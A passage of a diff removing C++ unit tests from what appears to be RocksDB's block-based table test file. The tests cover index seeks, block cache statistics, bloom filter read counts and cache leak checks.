-  auto props = reader->GetTableProperties();
-  ASSERT_EQ(5u, props->num_data_blocks);
-
-  std::unique_ptr<InternalIterator> index_iter(
-      reader->NewIterator(ReadOptions()));
-
-  // -- Find keys do not exist, but have common prefix.
-  std::vector<std::string> prefixes = {"001", "003", "005", "007", "009"};
-  std::vector<std::string> lower_bound = {keys[0], keys[1], keys[2],
-                                          keys[7], keys[9], };
-
-  // find the lower bound of the prefix
-  for (size_t i = 0; i < prefixes.size(); ++i) {
-    index_iter->Seek(InternalKey(prefixes[i], 0, kTypeValue).Encode());
-    ASSERT_OK(index_iter->status());
-    ASSERT_TRUE(index_iter->Valid());
-
-    // seek the first element in the block
-    ASSERT_EQ(lower_bound[i], index_iter->key().ToString());
-    ASSERT_EQ("v", index_iter->value().ToString());
-  }
-
-  // find the upper bound of prefixes
-  std::vector<std::string> upper_bound = {keys[1], keys[2], keys[7], keys[9], };
-
-  // find existing keys
-  for (const auto& item : kvmap) {
-    auto ukey = ExtractUserKey(item.first).ToString();
-    index_iter->Seek(ukey);
-
-    // ASSERT_OK(regular_iter->status());
-    ASSERT_OK(index_iter->status());
-
-    // ASSERT_TRUE(regular_iter->Valid());
-    ASSERT_TRUE(index_iter->Valid());
-
-    ASSERT_EQ(item.first, index_iter->key().ToString());
-    ASSERT_EQ(item.second, index_iter->value().ToString());
-  }
-
-  for (size_t i = 0; i < prefixes.size(); ++i) {
-    // the key is greater than any existing keys.
-    auto key = prefixes[i] + "9";
-    index_iter->Seek(InternalKey(key, 0, kTypeValue).Encode());
-
-    ASSERT_OK(index_iter->status());
-    if (i == prefixes.size() - 1) {
-      // last key
-      ASSERT_TRUE(!index_iter->Valid());
-    } else {
-      ASSERT_TRUE(index_iter->Valid());
-      // seek the first element in the block
-      ASSERT_EQ(upper_bound[i], index_iter->key().ToString());
-      ASSERT_EQ("v", index_iter->value().ToString());
-    }
-  }
-
-  // find keys with prefix that don't match any of the existing prefixes.
-  std::vector<std::string> non_exist_prefixes = {"002", "004", "006", "008"};
-  for (const auto& prefix : non_exist_prefixes) {
-    index_iter->Seek(InternalKey(prefix, 0, kTypeValue).Encode());
-    // regular_iter->Seek(prefix);
-
-    ASSERT_OK(index_iter->status());
-    // Seek to non-existing prefixes should yield either invalid, or a
-    // key with prefix greater than the target.
-    if (index_iter->Valid()) {
-      Slice ukey = ExtractUserKey(index_iter->key());
-      Slice ukey_prefix = options.prefix_extractor->Transform(ukey);
-      ASSERT_TRUE(BytewiseComparator()->Compare(prefix, ukey_prefix) < 0);
-    }
-  }
-  c.ResetTableReader();
-}
-
-TEST_F(TableTest, BinaryIndexTest) {
-  BlockBasedTableOptions table_options;
-  table_options.index_type = BlockBasedTableOptions::kBinarySearch;
-  IndexTest(table_options);
-}
-
-TEST_F(TableTest, HashIndexTest) {
-  BlockBasedTableOptions table_options;
-  table_options.index_type = BlockBasedTableOptions::kHashSearch;
-  IndexTest(table_options);
-}
-
-TEST_F(TableTest, PartitionIndexTest) {
-  const int max_index_keys = 5;
-  const int est_max_index_key_value_size = 32;
-  const int est_max_index_size = max_index_keys * est_max_index_key_value_size;
-  for (int i = 1; i <= est_max_index_size + 1; i++) {
-    BlockBasedTableOptions table_options;
-    table_options.index_type = BlockBasedTableOptions::kTwoLevelIndexSearch;
-    table_options.metadata_block_size = i;
-    IndexTest(table_options);
-  }
-}
-
-// It's very hard to figure out the index block size of a block accurately.
-// To make sure we get the index size, we just make sure as key number
-// grows, the filter block size also grows.
-TEST_F(BlockBasedTableTest, IndexSizeStat) {
-  uint64_t last_index_size = 0;
-
-  // we need to use random keys since the pure human readable texts
-  // may be well compressed, resulting insignifcant change of index
-  // block size.
-  Random rnd(test::RandomSeed());
-  std::vector<std::string> keys;
-
-  for (int i = 0; i < 100; ++i) {
-    keys.push_back(RandomString(&rnd, 10000));
-  }
-
-  // Each time we load one more key to the table. the table index block
-  // size is expected to be larger than last time's.
-  for (size_t i = 1; i < keys.size(); ++i) {
-    TableConstructor c(BytewiseComparator(),
-                       true /* convert_to_internal_key_ */);
-    for (size_t j = 0; j < i; ++j) {
-      c.Add(keys[j], "val");
-    }
-
-    std::vector<std::string> ks;
-    stl_wrappers::KVMap kvmap;
-    Options options;
-    options.compression = kNoCompression;
-    BlockBasedTableOptions table_options;
-    table_options.block_restart_interval = 1;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &ks, &kvmap);
-    auto index_size = c.GetTableReader()->GetTableProperties()->index_size;
-    ASSERT_GT(index_size, last_index_size);
-    last_index_size = index_size;
-    c.ResetTableReader();
-  }
-}
-
-TEST_F(BlockBasedTableTest, NumBlockStat) {
-  Random rnd(test::RandomSeed());
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  Options options;
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = 1;
-  table_options.block_size = 1000;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  for (int i = 0; i < 10; ++i) {
-    // the key/val are slightly smaller than block size, so that each block
-    // holds roughly one key/value pair.
-    c.Add(RandomString(&rnd, 900), "val");
-  }
-
-  std::vector<std::string> ks;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &ks, &kvmap);
-  ASSERT_EQ(kvmap.size(),
-            c.GetTableReader()->GetTableProperties()->num_data_blocks);
-  c.ResetTableReader();
-}
-
-// A simple tool that takes the snapshot of block cache statistics.
-class BlockCachePropertiesSnapshot {
- public:
-  explicit BlockCachePropertiesSnapshot(Statistics* statistics) {
-    block_cache_miss = statistics->getTickerCount(BLOCK_CACHE_MISS);
-    block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_HIT);
-    index_block_cache_miss = statistics->getTickerCount(BLOCK_CACHE_INDEX_MISS);
-    index_block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_INDEX_HIT);
-    data_block_cache_miss = statistics->getTickerCount(BLOCK_CACHE_DATA_MISS);
-    data_block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_DATA_HIT);
-    filter_block_cache_miss =
-        statistics->getTickerCount(BLOCK_CACHE_FILTER_MISS);
-    filter_block_cache_hit = statistics->getTickerCount(BLOCK_CACHE_FILTER_HIT);
-    block_cache_bytes_read = statistics->getTickerCount(BLOCK_CACHE_BYTES_READ);
-    block_cache_bytes_write =
-        statistics->getTickerCount(BLOCK_CACHE_BYTES_WRITE);
-  }
-
-  void AssertIndexBlockStat(int64_t expected_index_block_cache_miss,
-                            int64_t expected_index_block_cache_hit) {
-    ASSERT_EQ(expected_index_block_cache_miss, index_block_cache_miss);
-    ASSERT_EQ(expected_index_block_cache_hit, index_block_cache_hit);
-  }
-
-  void AssertFilterBlockStat(int64_t expected_filter_block_cache_miss,
-                             int64_t expected_filter_block_cache_hit) {
-    ASSERT_EQ(expected_filter_block_cache_miss, filter_block_cache_miss);
-    ASSERT_EQ(expected_filter_block_cache_hit, filter_block_cache_hit);
-  }
-
-  // Check if the fetched props matches the expected ones.
-  // TODO(kailiu) Use this only when you disabled filter policy!
-  void AssertEqual(int64_t expected_index_block_cache_miss,
-                   int64_t expected_index_block_cache_hit,
-                   int64_t expected_data_block_cache_miss,
-                   int64_t expected_data_block_cache_hit) const {
-    ASSERT_EQ(expected_index_block_cache_miss, index_block_cache_miss);
-    ASSERT_EQ(expected_index_block_cache_hit, index_block_cache_hit);
-    ASSERT_EQ(expected_data_block_cache_miss, data_block_cache_miss);
-    ASSERT_EQ(expected_data_block_cache_hit, data_block_cache_hit);
-    ASSERT_EQ(expected_index_block_cache_miss + expected_data_block_cache_miss,
-              block_cache_miss);
-    ASSERT_EQ(expected_index_block_cache_hit + expected_data_block_cache_hit,
-              block_cache_hit);
-  }
-
-  int64_t GetCacheBytesRead() { return block_cache_bytes_read; }
-
-  int64_t GetCacheBytesWrite() { return block_cache_bytes_write; }
-
- private:
-  int64_t block_cache_miss = 0;
-  int64_t block_cache_hit = 0;
-  int64_t index_block_cache_miss = 0;
-  int64_t index_block_cache_hit = 0;
-  int64_t data_block_cache_miss = 0;
-  int64_t data_block_cache_hit = 0;
-  int64_t filter_block_cache_miss = 0;
-  int64_t filter_block_cache_hit = 0;
-  int64_t block_cache_bytes_read = 0;
-  int64_t block_cache_bytes_write = 0;
-};
-
-// Make sure, by default, index/filter blocks were pre-loaded (meaning we won't
-// use block cache to store them).
-TEST_F(BlockBasedTableTest, BlockCacheDisabledTest) {
-  Options options;
-  options.create_if_missing = true;
-  options.statistics = CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = NewLRUCache(1024, 4);
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("key", "value");
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-  // preloading filter/index blocks is enabled.
-  auto reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  ASSERT_TRUE(reader->TEST_filter_block_preloaded());
-  ASSERT_TRUE(reader->TEST_index_reader_preloaded());
-
-  {
-    // nothing happens in the beginning
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertIndexBlockStat(0, 0);
-    props.AssertFilterBlockStat(0, 0);
-  }
-
-  {
-    GetContext get_context(options.comparator, nullptr, nullptr, nullptr,
-                           GetContext::kNotFound, Slice(), nullptr, nullptr,
-                           nullptr, nullptr, nullptr);
-    // a hack that just to trigger BlockBasedTable::GetFilter.
-    reader->Get(ReadOptions(), "non-exist-key", &get_context);
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertIndexBlockStat(0, 0);
-    props.AssertFilterBlockStat(0, 0);
-  }
-}
-
-// Due to the difficulities of the intersaction between statistics, this test
-// only tests the case when "index block is put to block cache"
-TEST_F(BlockBasedTableTest, FilterBlockInBlockCache) {
-  // -- Table construction
-  Options options;
-  options.create_if_missing = true;
-  options.statistics = CreateDBStatistics();
-
-  // Enable the cache for index/filter blocks
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = NewLRUCache(1024, 4);
-  table_options.cache_index_and_filter_blocks = true;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("key", "value");
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-  // preloading filter/index blocks is prohibited.
-  auto* reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  ASSERT_TRUE(!reader->TEST_filter_block_preloaded());
-  ASSERT_TRUE(!reader->TEST_index_reader_preloaded());
-
-  // -- PART 1: Open with regular block cache.
-  // Since block_cache is disabled, no cache activities will be involved.
-  unique_ptr<InternalIterator> iter;
-
-  int64_t last_cache_bytes_read = 0;
-  // At first, no block will be accessed.
-  {
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    // index will be added to block cache.
-    props.AssertEqual(1,  // index block miss
-                      0, 0, 0);
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-    last_cache_bytes_read = props.GetCacheBytesRead();
-  }
-
-  // Only index block will be accessed
-  {
-    iter.reset(c.NewIterator());
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    // NOTE: to help better highlight the "detla" of each ticker, I use
-    // <last_value> + <added_value> to indicate the increment of changed
-    // value; other numbers remain the same.
-    props.AssertEqual(1, 0 + 1,  // index block hit
-                      0, 0);
-    // Cache hit, bytes read from cache should increase
-    ASSERT_GT(props.GetCacheBytesRead(), last_cache_bytes_read);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-    last_cache_bytes_read = props.GetCacheBytesRead();
-  }
-
-  // Only data block will be accessed
-  {
-    iter->SeekToFirst();
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1, 1, 0 + 1,  // data block miss
-                      0);
-    // Cache miss, Bytes read from cache should not change
-    ASSERT_EQ(props.GetCacheBytesRead(), last_cache_bytes_read);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-    last_cache_bytes_read = props.GetCacheBytesRead();
-  }
-
-  // Data block will be in cache
-  {
-    iter.reset(c.NewIterator());
-    iter->SeekToFirst();
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1, 1 + 1, /* index block hit */
-                      1, 0 + 1 /* data block hit */);
-    // Cache hit, bytes read from cache should increase
-    ASSERT_GT(props.GetCacheBytesRead(), last_cache_bytes_read);
-    ASSERT_EQ(props.GetCacheBytesWrite(),
-              table_options.block_cache->GetUsage());
-  }
-  // release the iterator so that the block cache can reset correctly.
-  iter.reset();
-
-  c.ResetTableReader();
-
-  // -- PART 2: Open with very small block cache
-  // In this test, no block will ever get hit since the block cache is
-  // too small to fit even one entry.
-  table_options.block_cache = NewLRUCache(1, 4);
-  options.statistics = CreateDBStatistics();
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  const ImmutableCFOptions ioptions2(options);
-  c.Reopen(ioptions2);
-  {
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1,  // index block miss
-                      0, 0, 0);
-    // Cache miss, Bytes read from cache should not change
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-  }
-
-  {
-    // Both index and data block get accessed.
-    // It first cache index block then data block. But since the cache size
-    // is only 1, index block will be purged after data block is inserted.
-    iter.reset(c.NewIterator());
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(1 + 1,  // index block miss
-                      0, 0,   // data block miss
-                      0);
-    // Cache hit, bytes read from cache should increase
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-  }
-
-  {
-    // SeekToFirst() accesses data block. With similar reason, we expect data
-    // block's cache miss.
-    iter->SeekToFirst();
-    BlockCachePropertiesSnapshot props(options.statistics.get());
-    props.AssertEqual(2, 0, 0 + 1,  // data block miss
-                      0);
-    // Cache miss, Bytes read from cache should not change
-    ASSERT_EQ(props.GetCacheBytesRead(), 0);
-  }
-  iter.reset();
-  c.ResetTableReader();
-
-  // -- PART 3: Open table with bloom filter enabled but not in SST file
-  table_options.block_cache = NewLRUCache(4096, 4);
-  table_options.cache_index_and_filter_blocks = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  TableConstructor c3(BytewiseComparator());
-  std::string user_key = "k01";
-  InternalKey internal_key(user_key, 0, kTypeValue);
-  c3.Add(internal_key.Encode().ToString(), "hello");
-  ImmutableCFOptions ioptions3(options);
-  // Generate table without filter policy
-  c3.Finish(options, ioptions3, table_options,
-            GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-  c3.ResetTableReader();
-
-  // Open table with filter policy
-  table_options.filter_policy.reset(NewBloomFilterPolicy(1));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  options.statistics = CreateDBStatistics();
-  ImmutableCFOptions ioptions4(options);
-  ASSERT_OK(c3.Reopen(ioptions4));
-  reader = dynamic_cast<BlockBasedTable*>(c3.GetTableReader());
-  ASSERT_TRUE(!reader->TEST_filter_block_preloaded());
-  PinnableSlice value;
-  GetContext get_context(options.comparator, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, user_key, &value, nullptr,
-                         nullptr, nullptr, nullptr);
-  ASSERT_OK(reader->Get(ReadOptions(), user_key, &get_context));
-  ASSERT_STREQ(value.data(), "hello");
-  BlockCachePropertiesSnapshot props(options.statistics.get());
-  props.AssertFilterBlockStat(0, 0);
-  c3.ResetTableReader();
-}
-
-void ValidateBlockSizeDeviation(int value, int expected) {
-  BlockBasedTableOptions table_options;
-  table_options.block_size_deviation = value;
-  BlockBasedTableFactory* factory = new BlockBasedTableFactory(table_options);
-
-  const BlockBasedTableOptions* normalized_table_options =
-      (const BlockBasedTableOptions*)factory->GetOptions();
-  ASSERT_EQ(normalized_table_options->block_size_deviation, expected);
-
-  delete factory;
-}
-
-void ValidateBlockRestartInterval(int value, int expected) {
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = value;
-  BlockBasedTableFactory* factory = new BlockBasedTableFactory(table_options);
-
-  const BlockBasedTableOptions* normalized_table_options =
-      (const BlockBasedTableOptions*)factory->GetOptions();
-  ASSERT_EQ(normalized_table_options->block_restart_interval, expected);
-
-  delete factory;
-}
-
-TEST_F(BlockBasedTableTest, InvalidOptions) {
-  // invalid values for block_size_deviation (<0 or >100) are silently set to 0
-  ValidateBlockSizeDeviation(-10, 0);
-  ValidateBlockSizeDeviation(-1, 0);
-  ValidateBlockSizeDeviation(0, 0);
-  ValidateBlockSizeDeviation(1, 1);
-  ValidateBlockSizeDeviation(99, 99);
-  ValidateBlockSizeDeviation(100, 100);
-  ValidateBlockSizeDeviation(101, 0);
-  ValidateBlockSizeDeviation(1000, 0);
-
-  // invalid values for block_restart_interval (<1) are silently set to 1
-  ValidateBlockRestartInterval(-10, 1);
-  ValidateBlockRestartInterval(-1, 1);
-  ValidateBlockRestartInterval(0, 1);
-  ValidateBlockRestartInterval(1, 1);
-  ValidateBlockRestartInterval(2, 2);
-  ValidateBlockRestartInterval(1000, 1000);
-}
-
-TEST_F(BlockBasedTableTest, BlockReadCountTest) {
-  // bloom_filter_type = 0 -- block-based filter
-  // bloom_filter_type = 0 -- full filter
-  for (int bloom_filter_type = 0; bloom_filter_type < 2; ++bloom_filter_type) {
-    for (int index_and_filter_in_cache = 0; index_and_filter_in_cache < 2;
-         ++index_and_filter_in_cache) {
-      Options options;
-      options.create_if_missing = true;
-
-      BlockBasedTableOptions table_options;
-      table_options.block_cache = NewLRUCache(1, 0);
-      table_options.cache_index_and_filter_blocks = index_and_filter_in_cache;
-      table_options.filter_policy.reset(
-          NewBloomFilterPolicy(10, bloom_filter_type == 0));
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      std::vector<std::string> keys;
-      stl_wrappers::KVMap kvmap;
-
-      TableConstructor c(BytewiseComparator());
-      std::string user_key = "k04";
-      InternalKey internal_key(user_key, 0, kTypeValue);
-      std::string encoded_key = internal_key.Encode().ToString();
-      c.Add(encoded_key, "hello");
-      ImmutableCFOptions ioptions(options);
-      // Generate table with filter policy
-      c.Finish(options, ioptions, table_options,
-               GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-      auto reader = c.GetTableReader();
-      PinnableSlice value;
-      GetContext get_context(options.comparator, nullptr, nullptr, nullptr,
-                             GetContext::kNotFound, user_key, &value, nullptr,
-                             nullptr, nullptr, nullptr);
-      get_perf_context()->Reset();
-      ASSERT_OK(reader->Get(ReadOptions(), encoded_key, &get_context));
-      if (index_and_filter_in_cache) {
-        // data, index and filter block
-        ASSERT_EQ(get_perf_context()->block_read_count, 3);
-      } else {
-        // just the data block
-        ASSERT_EQ(get_perf_context()->block_read_count, 1);
-      }
-      ASSERT_EQ(get_context.State(), GetContext::kFound);
-      ASSERT_STREQ(value.data(), "hello");
-
-      // Get non-existing key
-      user_key = "does-not-exist";
-      internal_key = InternalKey(user_key, 0, kTypeValue);
-      encoded_key = internal_key.Encode().ToString();
-
-      value.Reset();
-      get_context = GetContext(options.comparator, nullptr, nullptr, nullptr,
-                               GetContext::kNotFound, user_key, &value, nullptr,
-                               nullptr, nullptr, nullptr);
-      get_perf_context()->Reset();
-      ASSERT_OK(reader->Get(ReadOptions(), encoded_key, &get_context));
-      ASSERT_EQ(get_context.State(), GetContext::kNotFound);
-
-      if (index_and_filter_in_cache) {
-        if (bloom_filter_type == 0) {
-          // with block-based, we read index and then the filter
-          ASSERT_EQ(get_perf_context()->block_read_count, 2);
-        } else {
-          // with full-filter, we read filter first and then we stop
-          ASSERT_EQ(get_perf_context()->block_read_count, 1);
-        }
-      } else {
-        // filter is already in memory and it figures out that the key doesn't
-        // exist
-        ASSERT_EQ(get_perf_context()->block_read_count, 0);
-      }
-    }
-  }
-}
-
-// A wrapper around LRICache that also keeps track of data blocks (in contrast
-// with the objects) in the cache. The class is very simple and can be used only
-// for trivial tests.
-class MockCache : public LRUCache {
- public:
-  MockCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit,
-            double high_pri_pool_ratio)
-      : LRUCache(capacity, num_shard_bits, strict_capacity_limit,
-                 high_pri_pool_ratio) {}
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle = nullptr,
-                        Priority priority = Priority::LOW) override {
-    // Replace the deleter with our own so that we keep track of data blocks
-    // erased from the cache
-    deleters_[key.ToString()] = deleter;
-    return ShardedCache::Insert(key, value, charge, &MockDeleter, handle,
-                                priority);
-  }
-  // This is called by the application right after inserting a data block
-  virtual void TEST_mark_as_data_block(const Slice& key,
-                                       size_t charge) override {
-    marked_data_in_cache_[key.ToString()] = charge;
-    marked_size_ += charge;
-  }
-  using DeleterFunc = void (*)(const Slice& key, void* value);
-  static std::map<std::string, DeleterFunc> deleters_;
-  static std::map<std::string, size_t> marked_data_in_cache_;
-  static size_t marked_size_;
-  static void MockDeleter(const Slice& key, void* value) {
-    // If the item was marked for being data block, decrease its usage from  the
-    // total data block usage of the cache
-    if (marked_data_in_cache_.find(key.ToString()) !=
-        marked_data_in_cache_.end()) {
-      marked_size_ -= marked_data_in_cache_[key.ToString()];
-    }
-    // Then call the origianl deleter
-    assert(deleters_.find(key.ToString()) != deleters_.end());
-    auto deleter = deleters_[key.ToString()];
-    deleter(key, value);
-  }
-};
-
-size_t MockCache::marked_size_ = 0;
-std::map<std::string, MockCache::DeleterFunc> MockCache::deleters_;
-std::map<std::string, size_t> MockCache::marked_data_in_cache_;
-
-// Block cache can contain raw data blocks as well as general objects. If an
-// object depends on the table to be live, it then must be destructed before the
-// table is closed. This test makes sure that the only items remains in the
-// cache after the table is closed are raw data blocks.
-TEST_F(BlockBasedTableTest, NoObjectInCacheAfterTableClose) {
-  for (auto index_type :
-       {BlockBasedTableOptions::IndexType::kBinarySearch,
-        BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch}) {
-    for (bool block_based_filter : {true, false}) {
-      for (bool partition_filter : {true, false}) {
-        if (partition_filter &&
-            (block_based_filter ||
-             index_type !=
-                 BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch)) {
-          continue;
-        }
-        for (bool index_and_filter_in_cache : {true, false}) {
-          for (bool pin_l0 : {true, false}) {
-            if (pin_l0 && !index_and_filter_in_cache) {
-              continue;
-            }
-            // Create a table
-            Options opt;
-            unique_ptr<InternalKeyComparator> ikc;
-            ikc.reset(new test::PlainInternalKeyComparator(opt.comparator));
-            opt.compression = kNoCompression;
-            BlockBasedTableOptions table_options;
-            table_options.block_size = 1024;
-            table_options.index_type =
-                BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-            table_options.pin_l0_filter_and_index_blocks_in_cache = pin_l0;
-            table_options.partition_filters = partition_filter;
-            table_options.cache_index_and_filter_blocks =
-                index_and_filter_in_cache;
-            // big enough so we don't ever lose cached values.
-            table_options.block_cache = std::shared_ptr<rocksdb::Cache>(
-                new MockCache(16 * 1024 * 1024, 4, false, 0.0));
-            table_options.filter_policy.reset(
-                rocksdb::NewBloomFilterPolicy(10, block_based_filter));
-            opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-            TableConstructor c(BytewiseComparator());
-            std::string user_key = "k01";
-            std::string key =
-                InternalKey(user_key, 0, kTypeValue).Encode().ToString();
-            c.Add(key, "hello");
-            std::vector<std::string> keys;
-            stl_wrappers::KVMap kvmap;
-            const ImmutableCFOptions ioptions(opt);
-            c.Finish(opt, ioptions, table_options, *ikc, &keys, &kvmap);
-
-            // Doing a read to make index/filter loaded into the cache
-            auto table_reader =
-                dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-            PinnableSlice value;
-            GetContext get_context(opt.comparator, nullptr, nullptr, nullptr,
-                                   GetContext::kNotFound, user_key, &value,
-                                   nullptr, nullptr, nullptr, nullptr);
-            InternalKey ikey(user_key, 0, kTypeValue);
-            auto s = table_reader->Get(ReadOptions(), key, &get_context);
-            ASSERT_EQ(get_context.State(), GetContext::kFound);
-            ASSERT_STREQ(value.data(), "hello");
-
-            // Close the table
-            c.ResetTableReader();
-
-            auto usage = table_options.block_cache->GetUsage();
-            auto pinned_usage = table_options.block_cache->GetPinnedUsage();
-            // The only usage must be for marked data blocks
-            ASSERT_EQ(usage, MockCache::marked_size_);
-            // There must be some pinned data since PinnableSlice has not
-            // released them yet
-            ASSERT_GT(pinned_usage, 0);
-            // Release pinnable slice reousrces
-            value.Reset();
-            pinned_usage = table_options.block_cache->GetPinnedUsage();
-            ASSERT_EQ(pinned_usage, 0);
-          }
-        }
-      }
-    }
-  }
-}
-
-TEST_F(BlockBasedTableTest, BlockCacheLeak) {
-  // Check that when we reopen a table we don't lose access to blocks already
-  // in the cache. This test checks whether the Table actually makes use of the
-  // unique ID from the file.
-
-  Options opt;
-  unique_ptr<InternalKeyComparator> ikc;
-  ikc.reset(new test::PlainInternalKeyComparator(opt.comparator));
-  opt.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  // big enough so we don't ever lose cached values.
-  table_options.block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("k01", "hello");
-  c.Add("k02", "hello2");
-  c.Add("k03", std::string(10000, 'x'));
-  c.Add("k04", std::string(200000, 'x'));
-  c.Add("k05", std::string(300000, 'x'));
-  c.Add("k06", "hello3");
-  c.Add("k07", std::string(100000, 'x'));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(opt);
-  c.Finish(opt, ioptions, table_options, *ikc, &keys, &kvmap);
-
-  unique_ptr<InternalIterator> iter(c.NewIterator());
-  iter->SeekToFirst();
-  while (iter->Valid()) {
-    iter->key();
-    iter->value();
-    iter->Next();
-  }
-  ASSERT_OK(iter->status());
-
-  const ImmutableCFOptions ioptions1(opt);
-  ASSERT_OK(c.Reopen(ioptions1));
-  auto table_reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  for (const std::string& key : keys) {
-    ASSERT_TRUE(table_reader->TEST_KeyInCache(ReadOptions(), key));
-  }
-  c.ResetTableReader();
-
-  // rerun with different block cache
-  table_options.block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  const ImmutableCFOptions ioptions2(opt);
-  ASSERT_OK(c.Reopen(ioptions2));
-  table_reader = dynamic_cast<BlockBasedTable*>(c.GetTableReader());
-  for (const std::string& key : keys) {
-    ASSERT_TRUE(!table_reader->TEST_KeyInCache(ReadOptions(), key));
-  }
-  c.ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, NewIndexIteratorLeak) {
-  // A regression test to avoid data race described in
-  // https://github.com/facebook/rocksdb/issues/1267
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  c.Add("a1", "val1");
-  Options options;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-  BlockBasedTableOptions table_options;
-  table_options.index_type = BlockBasedTableOptions::kHashSearch;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.block_cache = NewLRUCache(0);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependencyAndMarkers(
-      {
-          {"BlockBasedTable::NewIndexIterator::thread1:1",
-           "BlockBasedTable::NewIndexIterator::thread2:2"},
-          {"BlockBasedTable::NewIndexIterator::thread2:3",
-           "BlockBasedTable::NewIndexIterator::thread1:4"},
-      },
-      {
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread1Marker",
-           "BlockBasedTable::NewIndexIterator::thread1:1"},
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread1Marker",
-           "BlockBasedTable::NewIndexIterator::thread1:4"},
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread2Marker",
-           "BlockBasedTable::NewIndexIterator::thread2:2"},
-          {"BlockBasedTableTest::NewIndexIteratorLeak:Thread2Marker",
-           "BlockBasedTable::NewIndexIterator::thread2:3"},
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ReadOptions ro;
-  auto* reader = c.GetTableReader();
-
-  std::function<void()> func1 = [&]() {
-    TEST_SYNC_POINT("BlockBasedTableTest::NewIndexIteratorLeak:Thread1Marker");
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-    iter->Seek(InternalKey("a1", 0, kTypeValue).Encode());
-  };
-
-  std::function<void()> func2 = [&]() {
-    TEST_SYNC_POINT("BlockBasedTableTest::NewIndexIteratorLeak:Thread2Marker");
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-  };
-
-  auto thread1 = port::Thread(func1);
